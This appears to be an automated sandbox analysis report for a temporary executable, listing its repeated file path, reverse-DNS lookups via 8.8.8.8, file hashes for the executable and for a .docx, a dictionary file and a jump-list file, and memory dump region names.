C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
| MD5 | 347684b6130a16aace57a364658c8435 |
| SHA1 | 9f6a1ceb820319d56f047b0c1213f7359dc6b7da |
| SHA256 | 4bc47e12fdaadd5d9da37ee13c5c173bf61a013823f5c49065cd5d43f2ddef94 |
| SHA512 | 0596c6f6b80bba6bf4a1874019faf3198a3d9d0dcf1c79bcaa76a5324adf3ee8ce03bc627d77bbe6b565f86caab8ba9df826d894704d13243bfef32005d4f9f7 |
memory/5040-12-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-15-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-14-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-17-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-19-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-23-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-28-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-29-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-30-0x00007FFAC88F0000-0x00007FFAC8900000-memory.dmp
memory/5040-27-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-32-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-31-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-34-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-37-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-36-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-35-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-33-0x00007FFAC88F0000-0x00007FFAC8900000-memory.dmp
memory/5040-25-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-22-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-21-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-20-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-18-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-24-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\doc_ed11ce.docx
| MD5 | 24a09f3f72fe19cc920e86645626f197 |
| SHA1 | e9cee70b03d0938b8590b01ea89325f65ec90971 |
| SHA256 | 37073e6c5503ebe0b3101f42f98c56892e1db686e5592255faf443ee6066dce6 |
| SHA512 | c59049f19d5eb81283c1848c8145f7a22c1386a40af9d31f3641fecb6d762f75660492f58797514d1053ea87e53635307cdd75366f87ba18f019523967cf27e1 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | edda796fa8309a78204eeb7d05f1889f |
| SHA1 | ed15d819882b3eebf9a6c5787c7d59698b7da05d |
| SHA256 | 7da2e5e4399a2b71601b60a19283e010bb9cf7db3a5b95b9f98315f0ba215472 |
| SHA512 | 4300fa9234d0cfb4ae4f6741d20d99ece0027974554e32bd7e426509a2f7a24b298795d1fff720aa5d6b4b8abd930416e04ec0a3cc9c02bc0939ed7d985b5a2a |
memory/5040-127-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-128-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-129-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp
memory/5040-149-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-151-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-152-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-150-0x00007FFACB250000-0x00007FFACB260000-memory.dmp
memory/5040-153-0x00007FFB0B1D0000-0x00007FFB0B3C5000-memory.dmp